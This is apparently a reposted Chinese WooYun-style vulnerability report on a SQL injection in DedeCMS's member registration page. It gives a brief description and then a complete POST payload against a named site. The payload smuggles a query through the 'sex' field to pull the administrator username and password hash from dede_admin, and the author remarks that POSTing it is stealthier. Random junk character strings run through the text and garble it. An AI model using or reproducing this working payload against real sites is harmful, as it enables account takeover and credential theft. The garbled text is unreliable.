漏洞类型: SQL注射漏洞
0 f+ C' L" h q7 G) L w; k! I简要描述:1 ^- }+ n9 x ?& U! H
) h. y7 X: M& ?" D3 Y1 ~( T" t2 P5 \7 A需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.6 `3 L3 z# O. R$ N
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
! \& _! E7 M1 b0 Z) w详细说明:跟这个漏洞0 [' P* D2 E S, O0 c$ m& x8 l
( b* T9 U) } M" t2 aWooYun: Dedecms SQL注射导致审核机制绕过漏洞; U( W- y1 N' q5 A0 ?
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.; Y. v. A0 [6 a/ H' Y2 {7 r, b
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
# _2 }" ? r5 C( [" N* O( i5 v% N ( p1 e" L) \" T7 a* u+ `
www.political-security.com/member/reg_new.php h: Y" x( [+ m! ]/ v" |, y
4 H k1 N! s4 _% H% |POST' H3 ]+ z/ G4 f& Q" ?1 r1 Q0 s Y0 F
9 I. W. A- l0 ~# z
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
* n0 y+ P; E+ p1 e3 q4 Cuserid=c4rp3nt3r&uname=c4rp3nt3r* }( F8 {& p# V8 [
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
8 \* E- o5 ?/ ?8 b& D2 p" A$ X. H0 x&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,( W+ h+ e6 Z# x' ~
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');* p& y; e/ M( S$ h( [
%00&vdcode=glos&agree= |